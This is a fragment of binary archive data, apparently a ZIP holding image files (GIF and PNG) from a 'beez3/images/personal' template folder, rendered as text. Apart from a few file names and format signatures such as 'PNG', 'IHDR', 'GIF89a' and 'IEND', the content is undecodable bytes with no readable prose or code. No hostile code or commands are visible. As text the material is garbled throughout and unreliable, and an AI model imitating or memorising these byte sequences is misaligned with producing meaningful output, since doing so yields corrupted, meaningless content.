��9G�Ŏ�bH�x����}1�E.�w*g�6@��Т��Q��q�1,=�$� ΄j�,�KI�0Ǵ�~��������B��ظ���l��L�4"�:PPX*T�	�ܻ?�s��L-��[:���	��2�庅`!N�������^Q��IEND�B`�PK!o$�99beez3/images/personal/ecke.gifnu&1i�GIF89a�&� ���������������������������������������������������������������������������������������������!� ,�&����A,�Ȥr�l:��(�@�Z�جv��z��B.���z�n����C���~����~������������������������������������������������������������������������������������������������������������������
H����*\Ȱ�Ç#J�H1!��3j�ȱ�Ǐ C�I2���(S�\ɲ�˗0cʜI3f��8s��ɳ���@�
J4���H�*]ʴ�ӧP�J�J5ꆫX�j�ʵ�ׯ`ÊK��ٳhӪ]�۷p�ʝK��ݻx��݋ׂ߿�L���È+^�x��ǐ#K�L���˘3kތ���ϠC�M���ӨS�^����װc˞M���۸s�ލ����N����ȓ+_μ���УK?ޡ���سk�ν����ËO������{?�������˟O������ۧ�����(�h�&h`6��F(�Vh�fh!v�V� �(�$�h�(���,���0���4�h�8��<���@����Di�H&��L6��P6	”TVi�Xf��\v��`v;PK!�]��wLwL#beez3/images/personal/personal2.pngnu&1i��PNG


IHDR$ [�R�PLTE4H&U�V�P����L}��k����)d�X�L�c�OZumv����e�;u�R�2l�h�M�,i�J�AqP�
^�?nN� F:Fd��Eu��O�Z�Q����]���
Z�����T�CtHzU�I|C{���\�b�3_Q�
V�/ZM�W�������Gxj���G�AY'N�/X��+U9o�*T8f
&O6q�N�K~$LO�$R���
"I���
Z�*p�'P��+`�<k#K2^2\N�'LIQ�R�J|K~%N6d�:k�)Me�+6bV�L~>s�.UK�����P�%M
*Q	%H��o�f���	[�@c-X��,R1g�4`6d&G!H5a2[|&>M�Ev1\��:h
I���T�	#E!H.Y|J}L�
'Kg�h�g�;i���e�$\�p�Hxa�H~"l�"r�b�V�Q�T�Z�<j$i�]�%a�?x�?n`�+r�!f�T�$p�R�m�Y�i���P�Q�1t�Aq)L���D}���Cq>p]�N����*8XJ�H��贸�^�5b��?v�
%L��
+O����P���@dS4^	&M	&NM�
(R<
5��
@A
3@k�
_{*).��Wq������8
-CX>C~�p��� 1��x�*;!%7.Le ��Dt�h���<
B��E��~��Q�I2IDATx���u�Fa>1=����A�ȔAq'Q"@h�&��3u7nw`�X�b���/dX�[%��.[
� ��۟��H�WR��a�a<K�'	�8�[��W"{����f��vy���j������}%��V�%� ��0C�rK3*A$"*Q���jh�� �����J%����	D��q��i�q��D���IC7ت�<�JL?�Tb;RՑG@*QN~����#`_UEя���¨�k"0��ݤ ��j"�^��a.1-�<fV�}��%n*���k�D�U���P�"0�*"1}aT{$*a��[^9����$"0�8���A�בG@%�M�Tn��Y�Ch���s�q[�FUR�5e{��(\ߕ���N ��Ж.�qG@�Ÿ۱T�;^�4uܑP7b��+�7#U}$n��e���N�FUR�	D�Gv(O�ۍ�*y$�"���8-���+u�P�5�^nN�۔�Y��;������^�����"0����iy��HS�	u#�����%���	D�׶<)x���ID`TuZ�fss	"?P	�]�
>�B��H�T�0}�ǫ�MU��������B$����5��PKa�}Z���^�ҕ�~�\�F�sc��,���\X��$"�@%�q}Wj�������ㆶ|,��
�H�ĭ}hx�Z�
�H������i";P	k\vx,��+MC$�*���C�s���J�~~Uh�c7��o�D�F�KUۻY�Y�54"���Tp����^��2@�U�ۨT"+�4D"n@��1t�J\��H�
hD���*���J��[��p��
�H�Dvxj�n�6
����s�c��UU��H�
�b��Wkϱ��D�/����HL��D�|-^ĸ~,�
¨�7�"���q}�P�D*A$���!�{�T�*A$b*�ܵ]+x^n�O$Rn��z����f�x"�P��R�Y+�H�T�\)Xw��D"n��¹y�RP�gK$�x1��?U*qwV�H$��6+SU	 ��%�n�竅�aTE$�x����GUDH��|��K�K	 ���!_�*o�\�HI��r돡����P�mUn�0�"@
�8�2W�/U	 �H���R�{a��.�?�X�1װ�����B$���
]��̌�B$�n�k��2gm�`�s�\��r5V"���(���v0V���-��r
�qG�X�\6�
�]�������
ʱ7V��B%�O�QUo,�R�K�c�b6�
��%��%W���G�Hx�*�p�K"�0�8�h�*!@
��?^|ko�	 �["+_4�����K��qJ�]o�	 �J�^lFg,�R�Dո%wc�	 ���^�so-��x�ꛆ<�%�����MÔ9k���KU?ػ�6�,��uɈU��	��Qp_N�&#]B�8{	�
�&��dS5� �I�
�Z�ۜ�֎����\��nR86)isb�h�W��V��bZY2:�g	D�O�8=��ġ<��J�ü�D)�T�ߕ�v�aKV�~u��*D����7*?*i�کW�旪�R\��+Q�m"n*����+�H�����U��v�Q���+�o�@$��׿��
7���z|���/U�"xRU��2B٣J�bQ8;ld�0�֋�ͲJ�{$`/{�c���]D�">�_�W��,Y����r�^�xv����u��~�+����a����m�Dd�J�h���2DW/��hQ�9,sfSFl��(�[�%��IV	D����c���l����)�d�Dt�|E�����H(;�u�e"�Tu� �z�a�Sf(��h��j�˾m���2>���w�b
#�J�3��/`8)ݒ���q����O���'O��|Q_?�F���*�_����Ҋ�-EpY_��)1���e����L�O$&?p�{$��øR_�6B��|~KՋ"AKcqS/�.��R/z���j%����Y%VW��1'�J
�I\�jj�,!riE��6Zt��5�e�G���
�/p8R�A��+���r������)(H���{��+Fl���dG����$*O�z�="��y���N{�j;miQW��bhޫ�S���ş��������)r�N�;�).�c��%���>��i��;I�;�,T����� �{�;K�r\��z�i�O�,�8�x;g�ńGD~���X�̧�s�w���n�{f=#�,q�
gU��
c7{/�H�k�Μ�HYZ�N�E/�$v��X�H����w�;���"�d�h��K�ȕ\�/�D���T�W%�R�K~�9/>��w������q�Y���fo�2�֒�ȗiݙ3�0~�q~5�t��G"n;���<�{����۷�?FΒ��H��);b>���b��ngM�HA�竱Ms�s_?���r��W"�%�w��vv2����K����.'��IC
�~�9�,�"�����/U9E�"�D�m�����gI��ȗ�R���2΅�Y��D$J0K���[0����<�[����o�KI�c#HY��i�q/ध{�J��/xt�����]p�~<<<Lb)�t$�%W#0י/&��^�q&��}g�#�ng�`�ݢv�u�<>kI+oĴ��(�&�>	鸗��N�Qb�#����;n��K�H�8������1u��z�K��p�ýۈ@*q�|�]"-R\Ƴ�e�J�ߒ>e���f^�$�����J��k
��$�T�.�ڞm��Q�Ɲ>�,.%�mY|��
-���ƽ�9��{$`��F�[%�u��ӑ����Ņ32f�o;y?����c�=��"P�J�{0y0�[-ȷ�� O�n�vv�mW�K�O�SwX���#D����ᨺ�Xģ~�zv�0v9��IԒ�q����WL��iq�eev��t$m�%�UF��M��8	.�@$��j��`�N�(�Hj��O")��E�j��"n�콈�=� ���d�{\-p"[QN�TZ��Z	��m?M<"KV�A$n@	\�f�������	�"%d4'tأി���L�v4�{%:r�E�	(�[��Y�y�R%�6)���G㦭�#{T]�ǂ|Yuc퓲e�}�~?"P�J��j��1v���8����Z����=|³g���,�#�t�j^��S�oK����OW�&3�i�{����q��	�ߗ	��(W%�w;E�1'�Y���D: ���m/?dtfdh��?���ٗ�سPO��+1�]ў�i���s��<�v�<�����b��_B$�\���NQ�D����s��l>8,�)�/(!����2~?"PVO�'��p`���Gͳ��„���7T��l��t�F�� ��%��k�%���TEڟ?'��)�ya�1�2�.L���D�}b7��S�"w~W*=�렶%;E��^��N5���C����H��l�81WjE�W\6�.LlM�1Q���E�T{DkMgw���3�@�*qu2����T�f��t�V�w���_�o���-i�
ȗm�Ok�D�*q5kE��Z"�KQ�����w�D��HH�H��_;��d�ϲ�Dv��V�7���H{D>�=
X��i,�d�q�|������?{6�%�i�V0�Y�v�l�pw�%}}��E<�[)=� e�����VЏ�q��z�y$d�d�V'	aFQ"H٦V�I��:�g�]�D&�l�H��Nmu'��-<[�@$J��v�J}���*}�����Y��L
�rT+bTB�Wof'���+�%,�p�f8u�46f�5i���eZC$6��i�7�)[�²7R�d��\�H�@v�Ȯ^��fA����V�-��z�
�~��C$6��o��f�qq2�I�r��="��V��=YR�Gof���n��䳽���,�ƚ�"����9�$��T&2M<�q�C�CDb�*�ģ�RU�hЌu���m8y	"��'�Ʉ=n.i$��R�"��}�H|����|/q�NsɎ��ZS
"
X����!�ɬ�'G���,�0��a>y:�y�\��e�r��8v���� ��V�-ml�Hy��F$6�7w'ø�����K�r�H[��|"� 
P��q��#)z�eK)�z�H۳�}D`S=��g�Y�ag1J4�cf4��]���pG�	�M��W�Y"y����f�C8�Vl{�|m]��^�����_ٝ��[E�:�!�{�a��"O��M�č��x��0��g�������>���Hl.@%������u�Ռ��X���R�)Dbc*�߽<9�
�+�A̽$�>����	�M�K���ݝx�,_G�qHd�BE�	�M�%��'qcP4��;H�z�g�5	�M���qu��M�B"m�n
fFR�	�Mt�ooN��Π`G���&�i���"����&�񕛓$mvFP�
��?s��H��E��,�{:,�O��>��]�B3@$6��^�=,���HY�5�5$W�h�Hl.@%v'��V�����Y1�|6n"�|�؝�����'r�(B$6�_ٝğo��)!�%�`�\{1�%v��y�G�6�k P���k�e�P��6�"�ɮ]�X�ǰ5h��R�"�J�q���JLm"˴��*��]v\�$�/�"s/��*���HF�D���vatX�H����.UI������}ibj�;��f���߾�
�K�������x��=��|������%P�|�8M���x�M���k�J��H\�J�ӎt��� �%vd��D�7`�����^�5N��*�K;q��H|6�o�v��.�T�H��g�ˤ�H\��M�^�W`�}⿞��W�cD�'�p�3?x�+?>���/�_E$��7�F�4��,�!���(�9���� VN��]fu]��{��+)�cY#k���"��6x�\zB�W靫��{�i�de{���7o�bׅ������.��!��Kg��Z�r��kCv���zI�==��_K1[��03!���T�$�0L�oY��幧������=$�t���<�DĈ����)`���22�3|:�1�.�
r���)Ř�L�x援玧�ނ%��?���$�㎖��<О�����~�#`�X������=��s�@�P<v�R�����c+,������d�j��\	�j�K�f=�P
b�^�d�6*�-_up���#&K���%���.�ޜ^Z
��p����D��rJ�:H\v��Q��/I��
A�T�Џ�Κ���̌�(���(I�ZЛ!{N�ۆn���)�M��=���_>w�I�7+�IA��3���R�ɛr�h�~��)����N(M�a�~N�=�J�Q��1�A�'
ba��m�S38iO����q��'lX����y.��F�@Z %�fҗ�ˁ>�d��M�ZمJ�uAJ��g
��O�����%a�Lp�%��o�鐮�l7t؉ik:��\A�PF7v@!(��n��N�os��
dž���9O>��W�>��'��S����H_&A_n��&�s7��O�0�bى��>� �+�^�:�C����ܪ9I
<�n�C�;�'�ha�1��e�5A'j��2��@
2jw��9qq����d���*=01@������T��8܍E��bg�,*�S�2�$�:�7@�@h<;��(�j��*X�:��h���#%�5�e�9[�-@�B7�Eq�x�=m-�ǟ9�%�#�f�y5�S��n4e$	_�w啗7���}�"�����<���& 9<$F,DP�@��Bt�#ʠ�C�"��8�
�"�(k�ZiameiTh"��p&�']
����P�O�M	��]׌�q�6��x���D����[�0Iq0e#�V�@�F�F@�]P����� �<x���67�_���i�J5�׏�7,�)E�?�4|�D��8V/�Sx��k�@�����B�pB���hw�"
ze��1\`��
�s�`Y��X����1L 
d���"	�o{a�
��w�sD=�a�a4�М�f�Q�X�jk]��+]��>�CED��Y���᧋F\�W�/o�W�czG�ِ�M��|�d2���(�-��E"a �f�Q%�M�ܣH�TtS.��隦�5M+���e���ZS�&(���B�7:-��A!stD���V�9�9�J0-c��.��a%�̳�B��2�a��AlC[C�go����c	X�W���)	�K�;z�I~^n�aj�o

���[J��hnt@�MD�B;l؋SJ4zO���Xrs��{6�R$���r���&�0
��M`���
ސA�'�ى�dr$��f�R3RT�c�V3�5��F5%մ(6�W.��ЪZ�Z�\�V˳�jK�YAY�c�C#vWj��Pm��uyC^�@�ia(>V`����{�C{��@0c��#�����-�9ct��⇷}��C7vvv�������K�G�ǝ���0Z�FQ�A#FY�.�Z�M�k��m��Su5��>%
ƈX|-�6Av��LD<X�V�����Z�7��UՋ��ӄ0V8���P��@>�
���%A
�i�e�	$�i�����j�%P,�*�6K�LQw�š��Vf�)2g�=P0؀#�
�n�c�(��;�.QJ2=��
Y�+<H#�����0�6�q[/�gHbg�; D��󧎞�&)(�Ietj�2� # ���*�U��
�
��uP����:��~L�A	Ztp�&\�#!��'���Kp�>h!�E�T�R(�y�}�f��	'�ʪ�B����e5��i��Ԕ��b/aKf��H�$��D���؟ɤ29�,���}��oJ�R��8�e�(�9T��N��M#�Rm�$"(�tDW1=�����,\�!2�
��9��Y��d�Á�	F��M�TA��J�ƸH�Y��W?�_Ky>�A�ʈ�ޘ��	/�#!*8�찈𦱪�(.���-�(��b�X]ՕEWUn?���sR�Ya5���l&�=~��zH�ɼ�:�B6��\����U��B�K��T�_C�R��pB��@��
�L&��dc1�M�i����1D��=�T�'�d¤���h
m�JX��BX��7��F�Z^�^)��^��M	[�j���
| H7�C�*I
�:b�P0bw�yA�Q��L��D��8��x�EE!�b,qg8u�����Mo�~b����p�'X�!
���
{��'�x�11 D�!U>+`�rR�Be!tM�Ԟ�?i���؟:D��C����1�`���_�� �`b�T;W�WFVW�d��Kq�AiP/6�# ��W��T$�9R0=`P"��g��s�T'p��,
�R�+�Y�BS��E�����S���>X[�b��i3�1[�j���Z��DثK�M�9DL(��9_��{�8 h�Xp#urG���4Q�|>�9b�����u��$\��3,�a
���Egqvp�
��������2�
�T����ĵ�lK㱂	�
h��#[�)Z����PL���Fܐ~�4k������[l�GN�����D�Vx~���f�13����>�wn]�*�V�8~��\U��#������JT٬öB6V&&
�"���0/	ԂR���-�,#TiA�d�Ȃ!�j�i/ U*�V+��A/�(�b���e3%�u��v�YZ@
���XZ�Ts�$���N��Q*a��|a�/:��[�Ҧ��
�B�/t����X�l�ll����x9088ׁ��/������6 <�@`�VA�2@f��W��q��Z
�1p��N�А?g ��0��W�z,;� ��R	��P�^��]��������k�R�8~O�)�;���l��_-(#l���>ښ~��\��M��V��4�`V��n�UX�+�DI����X[X���.��/8� ��JC<�=X.0����Z>�b���۲�BEāb�j[�#�Z�.k5L���v�^�<�7�8Ͳ�'���r��r��m�yf��������O@��P|��Wf�R^ĝIx���\����
���'?�����>�PHcS/B��lŬ�4;/��cP�0e�+?����)�G|��GY���g�c<�\
�Z���}��'S£�P<����j�6�6Î�	&.%�����}^Ltt( F &���f�B�B:��jO.P#��V8�T�^�
Ԛ��k�~Vh�:��D@����"��t,_v�<Qi.Z���)�!�.���8�;t0����Ԑ@�foZE�#<��e��*�� lS�M�H``�!��,�9ƃ�hQ`w����i��y��Ǝ���Ͽ�K<dh�� �]��i&(�D6$��g�
�9������;���G�t{ll�d�����ݻO��5��fܙ�s����gn㌘�^[ۖ�z����?����o�r	H�/�_�"�-}~������JՇ��o�vy��|��AX��@m��A�o4���I��_B
0C���`�!� �����˱D �2`?���D
�Q�7	��>�
�Bǯ-�����J"�1���\�*�+�íX~/܀VD��:��K9J��fK����uPY\��~�����Y�S�J�ݵ�H �7X��"���L{+�W��0�<�X.`���Ă�_ɥ�a1�`>��_������c��S���;Pb�!hA:�xh`|
�ln,7������7
�,��y����1������W�N\]���ՏWW��N���9�}f�ଞ�'>w{8A�2^��?����/߆[��!S�%WߟՏ�_��	�KI}�+�[��>���~�iP<H�E�����AE�G��]cM1�3x��V�l�-��ѭ�}0��Pq1�"������k�?1���@-D�9���-���;��0���k�=�X�3��H$����L��('�����R�qTZ�A7�@�*��G�t��ЕE�	<����Qs��3��@u��Ͼ!������TB�/T���tے7���Vl6Q0n�m�T�_�
�ƍ��k��"ԕ r��X�Y\n�A_
��H� �o)��Ϡ�`
g �驤���Nn܉�G���8^��8��
�6��PO1Pf,�;���qI(�^e9��\r��ꯘ�շ��S��0d����'�K�\Cc����)VŨ!c��
06v-&Өtt��DK	��
p�V�>I���X�$1)A�+����Ԕe͑���P�#��]|�|H��~ XL�07�鴸�0��X�өԕ��8�N&.:�G<k/QY$uR���j��8�+��ZfUꮋ��뉗/�j$�P�&%��m�����|"[�<bqϷo���iL��!k�,��c�ﱌ��!���s��� -D����V����-p:��AC���JwL���o�����'�f/#���Ǩ1&�'�����1��-q��:����]���X�����8Y̞���Cb]�A�j@.�g�"�Kx`W<�.��~(�9�T��K	,)b=#j=Z2�"��%��}] �Id,7�z�_�@�	S���uh�I�W�
�n����c2�BsshG��K�B,��@6�R�^'ܐHp�Ţ�d1I$��qt�N�a]��#-�*�F2����b&#j��Յ�RY�1�d�px4K��(,tK�(��$�n}�P���9���pImi��3�͞��&�@F1�á�B�5�;~+��L�{s��_�]�#�@/R�#`���VI�5��I��t����#�I����]�cr��]�+��-6��-H�l�^����L���:��x)G��A�#(�}e)������?�ǐ�f'���++8�<�����3�
��~b[7�91J{�9~%ˍ�J����mJ��Š���.`��
�g���$�0���%NPG�Q!�U���s;�61�u7S��#�T�B:��Zr�#mt#0�XwCx�~�K�j`��Ƭ��𔲒�Fs=�K���
�3�:DJj8��Ԁ�@�KJU���A]��S�%��*��/�\�
ݓ&uhS�L���p�6��N�I�)���R����	�0��^�	��ۜ���@Y�A'u!�~����s�Wn��)��엠��+�z`^.�Ń��jPv`����KO�Y9L�J ��c�i|�z �}��@\9�y�B�?BVPqHey�#-0��BO��E
ԕ�[���G/�As���E)���w�]�Y�Kb�b��R>��+��h�v�Ta;r�:�t{}�B���1��
�d�Ѹx=τ�mVt�r��N�C�:��x@PS|���W|���&���_n̠�x��<��Xo`YҜ�7�ً�X�̄�R3��!�T}�1�zґk���0�Kv%�8,aYr'�Ɛ���cwa4/_ewQI�/��z%]�w��9Z"Zg.X;Ƚ��T�p	)D�n��w*��Ka���W,,L���	Ngk�Z^�[�H,xPB8h#�EaҐn+�~!J���p@�0����X��E7���z�y^�8](H33�c��8j�/�\�1-�b�u����!��Xm��8���g�<��0�_(A�=S9��a�@9���Ls)�Z�)�=^����W���es�ZΕ��r���z&F���A�=�f����f(�A)��{d��Փ�U�z��
�s�8K���JN�R�G��w�|M!�Y�tPK�9$
���"���U8p틬+b�v���3@��Y�w�
�g|Tq����bu��J
��jq�1e++��>�=)��y�
�� �����l�rO��vfR��W�ZmX傤�Uj�i�zEbʆ˵��-p�8vK���m�Mm�7�lJ��,*`�����
�ᦪ���0zx��4�>tév6���w�U}ԄO� ������p@�eCÖ{����#�ᛓHH>���7z�·�V�/^h|�:Wx����\Q�����S[�
�ɥ�b�����Q#���~Ղ�{V�A��{r�� OV��}E>�C�T.�W	�Hz2�<�!/�����~�V-ҩ�x'�z�p��=r����zS�U��J�q��4ڤ#��/y��Q�}q��4�W���U�c�+�=&�!�]��K^�p���o7�]����>U�$6�8m�B�R�C�`9 �d9DkDu&���X��0י�K~U����
��PW2zT2?x�|�����5���{~�/k���f	��T>VV ���k��p�\���ߺ�� 2�
x&���IZ�@&҅���\�=��-��'�L�K<���q�_�A�J
��H}��55�����iK���Ux�<.܉b�����]Mg�\g�'�� 2������&x���.�)&a�oB	�!񀁖��v3S���˻)
��@�r��q+]S>�F�z����CYM�p��x$��sݖ)��F�a09�T�<����
6 ��&��x�wAO��/�\��n���;o��:QD����p�p�p��ChQ��U��y�x�ƃ�3�<��,:�}V��!�	tZ��� ���d7��X�\U$�<y�I
�H��"ڗW���3�1tT�zĀ>dzb����}+:���ɺ�鼌�ޜN����XO��Ϧ��T�
T������mf*>.ӄ�W���tq�F�.�ӿt���=rP���O7�d&�l0�p���,%�0Y&�U�E����)2 	�6
����lRz��*6E��	N:T\K$X;���z���\z"����/��Z���4�ԩt8�M���V�B���T]�A�� /߃L��V�vںH���PXp@
{���X��cx�r�:�L,.[��RF@�D��L�Z�c�����nS
����j�r��*���)72�}#�e��q܀�j��� �<�r��v�v��DH�	���L%���]�I���1z��H6KI����y�+���a
j_O`�P;�R�8��x�8�+x<3�)�d"����ߎ�Yoi�]��>N���y�󀯓h����^�nR�sw�v�*�NLj��=���)��>.�R�����t<�z��D���MgrRԳ.n���-�7����7�E- �ZmlˢÔ�F���k��P�Z{nj��]v��2g�U"eء*SUM�d����,����l,R���Ay�Y��yy|3̚�O/Ɵ✛�Y�
�A�]f��6p4Ν�uؕ<�?�f8�,p�$Ԅ�p���Ә</;1�A�O�糌�P`a��Bb���ż��B��<)��?`���.S��=+���b��#��u	ヘ�_,�[�܃��Š[c;��F�"1��0�`���R�q���b����n��ZH�A7�QԖ�\�,Nx�&�
��8�c�̕մw]$U9����Fp�{Q;a;�-"���U��Ha9��C�t�����HY������3�o���"h
�
���/m
y�{�a@]�p��^�r`H���`<�XD@2���M!�`W��j�Y?�]g�#���.�簤j��tY@-U��?M�c0(�B~� �[�Vp�{�������p7~�W#Z8X�-/&:y��G+��
:�٪�D�qpP�(j�1���ۤD����[��=w���.�*�
��@�:3K9�_��K�|�
�-�jQfGԖUwʕjISvi�dB#K�Jk��κ��Is����C�5jW6���SL�~J176���$3X����/�,Ƚʡ�x�u?/`�����qKt��pFh�+ׇT���A
�2����<�Y�	cy�}?�ì%ȯ�UDP-�WV�����c�.���a<�2���a1��L#S�0�ȃ4�$:�z3��]7c���_��.Ҹ���F��h6d93�c鐙��q��l�J�c9n ���|pݪf��6��w�yX�r#*�Y��ث�4d��I��CÒ��E-F8��p@�Н�T{�PV��JhQ��j�hj4�_u��Z0�w|-l�	J��G��[1ط0���[/0PU\2+��WC��g�$�����}T���������^&YD�ZX=`�p�:-Q	�+Fz�K`qQ�D ��\f� �7��m��
~�����\�.ӊ�\��l\����l�X�%5HƯ���
�b���N�V����.i��[�n��4��41��9�t5mr��z���"�k���ո�|QP�X~�O1���+��tAa�^+��<oD}�
�Yc����l�!�n���~����A��Fj�v��f�{��ʵ�D�zI�9T����xK8c�j�(L�a/,��@��F�R%�mI��
J�q�p�F:o�Y_Y��j��D
�:����uB�bP7��Ġ�Ğ�0ϗ�_�-x0z�r��
��Q�5���."JY�-�D�s�>�#�isf-I4ͼO�gڛ�����X��
���O!�ldyq��+�(LM�>Ũpst�(a�K�5F���e�·Ĩ��c-��ʎ9�-�v�=� 	j�'RR|�.0<�#4>x�:J�_1q���t�1��a(�"`�򋋅Ep�##㪺 +`��|���D��O�ghf�hR⣄��v@>�iV>,����2E�'��v&P^l��~�s�vP���j=��r�X��'��D�Z5���Y&�y�]5�9^�C��a��=�Smv���o�o^Q��)LMF�,n"h
#c�9��a����������N0�����!J�u�#�##�_�$�,��C�LD�j����`m\�k�l��E�����N���d�R� J
x2)���/�/�
�d�2���cq�/��n^��1�.0�=H��2�t��)MZq<���ݒ<��{x=4z��꣇Ҽ���y�0�Y�K��
aN�gY��ʺ�,��h
|M��
�B3F���sS���	L�a�|;of����G_�>�`����@�o�oH�w�w{����F�{�aRQO���}��'��")�S�E����P���و�?��E��0/�Z��zxj�3��U�|[*��Ҿ��
�C=:9�L�V\ϞYG�ӤQ7֟��i$b�Yu���Hrl9�j@ղ%)<�L���	�ap>��gr��@N����ʁ$�k���*�)ze�,��a��	��	�@)�!�b�9�����M�xz�}g��{��c�Y��ƍ4���	��������p�I��6�$�VJ��H��Cj�_�T�<�1d��€<�2��	�(�,�H��1����@)��xw�J3��#��mʛ���K�b5�F{�$�*+/B"���E�z�Gy,�ޜ�/��M!u��QM�z=l�Ҽ\
j�KB1xc�ʟkUW��Q'�7��^vz��󅰃���a��	(=|��7�m�y���w�'�O_5��ܻ���c�LB+$��i��5S*�/ΙIŷ����o�Gcw��Ғ�O=����c��m�,���([ ��7N]�ݥ�я{L^+�����;���1����pCQ�[:�G�,<{�=f~T��w����!fu�Y�E�ӟ��s��|��T��4A��<�+�ld!	;�Zf!F�!>���E�u1����S���~�	�0��53_��}��9�Z��}\�c6TfX����w�
��
����Q1%�����"���>S�F�FZ(�
�S�eƽn*��H7�~�P��!ZX0e�� R%���2�"�-̆��i�$�!u'Tb�m9Hѽ��BX=��~Oz*�ȩ�%�$�{y��M�
�B��|h]`F�a0Uǐ9��<G���Ӈ+*B@X�l��3�e�/�����������m��8�&@`�d�f3x�m�<T�m�"ua�g&��0B�0_&�iaR
��7p�hT	�ț0��������b%�a]!r(	^[��YT�|�Q-��L�*
��fm�l�>��i�r�b�JQ��R?=����k���08���E�*4WL�2��1�x�'<�`�E��}�y�V�����DΫ�J����(&d�'�qAnxx�ﭮds*�T�䣈�'ǧ,&��[�,�)Mu&*�����Y�9F�kc�\�V1�1C?���{�
V<Uj�t�F��l�.ϕv���O�d��i|�G�CBK��"R�BJ冽|�z�=Գ�ȅ�;��/�\�,
�B�S��4�7ΑO���Ub@�\Wrg���1�_<�>/�5�Lr�H��d[�PԨ�������~8<����(��%|�ƒ�D`�M���r �Zi���F��'1�8�oJՖ�uL8%�g�%�Y�$q���b4�!��%z�a���xs2O$l�E�J¯���;���:n�\�vƍS���}bɼ��
��y��M��/�uw���9��_�}��5lR���OC�]�Ɂ�i��}�b)!�Ɩ���m#��K=���9��]��y�0��aVd�v��dtH����C9Rv:v<�o=���げxp9"���>��E��|�~4��N�#V�Xq����w��7"�ū�il$2��oI��S}�Ώ�`��]�{<o0�|5�*�j�R�1�m�k�}��;m�V�?Ѧ�!ݢ�Ra�B���c�"�"�x���<�"�Q�	$���k�r[&�����{!h����r��7�-����xH�����q>1�+"����%��
�W��!�c��0���z@�Q4Ny}34�o3�p*(G�����Dq�S�!�G�(j��D���4�!��!m�+�
!v�j+`4��·�T�m�o����8�gջ��C�~��;8W�^z��h�X(���9[f�rl�!&��q{�P-��D�p��!�,:_$S��i<hc��*�t�-�$Rq�X�O���BA��ԇ�B8~x贸
�U�W,�����De���c=�ж�;N�0�S��ǵq3�q�>~�RuE)�^��Az�%b�v|�*���ՃPS�%�\��0��@1c��w�K�<��N��:�-olv��M���"K�ϲ�;#����Zҷ��y����Z
)7��m�U��!~i!��$����ܓ_
�U���+S
E��+����.�C�
�oC�sPW��iJ�w��3�,h^~H�"�%����^����n����L2W	C:��l��>|;��r:�!��}0&>��͌�XPI
D;����&@��˄��7�r4���j~�q��ʲi%�nA�ϳ=�*�ݼ��$�������9|+�G&�ߤ��A�C���'n�$4Ue)�V��1ʐI��3���	s�|ev�ڎY��3S���[�w��$;K�~�pg����i�уR=0
V9���:�~��q�Bƒm��*@���	�?ѐu��j��?�F�S�}�1^Ԩd
2���p`� ��������Nȃ�͈�xNp
�2���5F�l��- "�Xö�|��MPi6%%C?��8��m51�	���|O��z��+j��R�!��I�2�7�����?-gj� H�K��_�����k?�%�
l6 �(��k�휒�#�\C~��ϖ~�#k���*#���� O@��).��Ԥ�}Ȳ�ː���}���~|�`�rҢٟS.Qyn�u�>�.S�i�y�u|��Z��<!�eX�j:�Q�L#&h�����I�{��&K��05�"
��@�4��Z�� ʐ躙(͂DR�P���k�]@���fBb�\]6$����n�r�X�R��&Q>�溧:�8�v����g6(ͅ���s���t8N�5��"Ģ�@J�I�x�BxS	u�)Q�f|.,�<Z�O��Y�L�����羽ٮM�O7�l�)1�'�SSe�fF�-
N6�ۥhd.��j���y`V����I1B�fr*���T�}I���x>-���,�9ٙO%�jYj�9�u�d�[d#s����0������4;�==8����G�75�M�$�*if�b�u4^���F��h	�;񭅺|R0˗���e��nC�yVd�OE$��2L�Lͤ01loO�9W�l@̊D���Tf2�����\����Z��BVܰ5w�-!�r'¹��Yols"��j���4$����E�c�|(��	�-Qk��Fk��:A�޴JT�2d�q�d�Y#v������f�Cd�c�����o��/�q]��n,�m?�d1�P����CZ��0�D�N��>�G���>��`M��:&I,�V5IY�ZB��t����+ަ�Y/��#]��Gd�0��h����bI���#�d1��b*D%&�u�4S�y$fצc�t �1)/
�I*�$G�˞%+�8����-�&G�Pv`d�M��e{��rᳱb(C���7ߴj
9>x����Ӌ&�Hs�jyՈ��~S�-�BRϞ%$���σp��ɳf���
Ge��,��&�|(8��“X�t�3Y"���L�="�d��0Lr�����G�eHg	���bs<L�y{mpvi�&�mO*u�|i"�l��I[�}$`����@��R#���<��&{t8�t��Y�K�W��g�	KH,iq����#O��y8l?t�Ul�-�
Fi:d�����0��@Rp*8v&��q��k��V�}y8��P�V�����>�Vv�̐sbfga�_�����m�Aq�r:���4ʊ�����L��Im�!�AQ�S�֐fC���QyR�?Ɵ5bm��bH,�h202Y��h���Nw2�=��F�~a�u</�����?l�g +����K���䁡�Hz7���sfE�g^������B���6�0�>E���>�{����h�9��л�2���Eȅڙ��E?:i�<'Q��v�?��^���kz>=W!����y�}��wݣ�{�*~^}H
�n�Υ1�;:a8��S�R��p��Mϵ�~�-�
��?�����Qѿ�`n2�FY�{e��K�?���LO��6��3a2D���'~�Z����Gx {!�@!�x��`�-Ѓ�`+-=��X��ᝀV�A\��YI2�|č-�x"�����+<P�XV��E����4ip��� �~��t#����'Ol^
_5��#�>������~7�z��Z7jr��q����h��Gn�7�~�b���E��ba��_}�`�X,�����އF-��{�{��}���F-��K���X,���C�Þ��IEND�B`�PK!�Y�pp%beez3/images/personal/arrow2_grey.pngnu&1i��PNG


IHDR		J�Λ7IDATxc����@B��p�� 	��PT��v��P�Z�bg(G�!K&NR{N�IEND�B`�PK!k�e~�� beez3/images/personal/button.pngnu&1i��PNG


IHDR~@S1T�IDATx�щ�� `�eq�n���1L(Ӻ+�s�k�t�Gh'�~��ږ��w޶�`��t���j0�)Щڦ����B�V�<��ˎ� ��{���;̈́����e�*i�^����κ��oB�U��y*��ܭ��U�)
���EUq���t�6G�p���y�ET���P!1���a��Ǒ L��դy��0R �#v��|�~�$�}W�j��P�Y��A�{ꡚ%�H9�AeA�B���t��N�d�w��������4���-�F�VT�E�*΍��+�:�;gS��:c��V��G���j�Z
���Fmv}��DZ_|d��>���s�w�̂�JY�/ViI��LXb��3T��<3p�9�LmF�"�����RK�6el¢Z�	ls�(kLB�X	eƑ��� �L��J�"�̬oF/��+_&5(�XDf�Q��X�T�o/��:�Ak����k`ΤM~q>��7:�����u����8e�o	f���~e�#��e��X�s���߶���`f�����!����7�Fx��	��e8�y�����_~�%�.~����W�M �&C��\��ܗ�^�5)��������_P��[2�g������6^(^=>:fY�e�
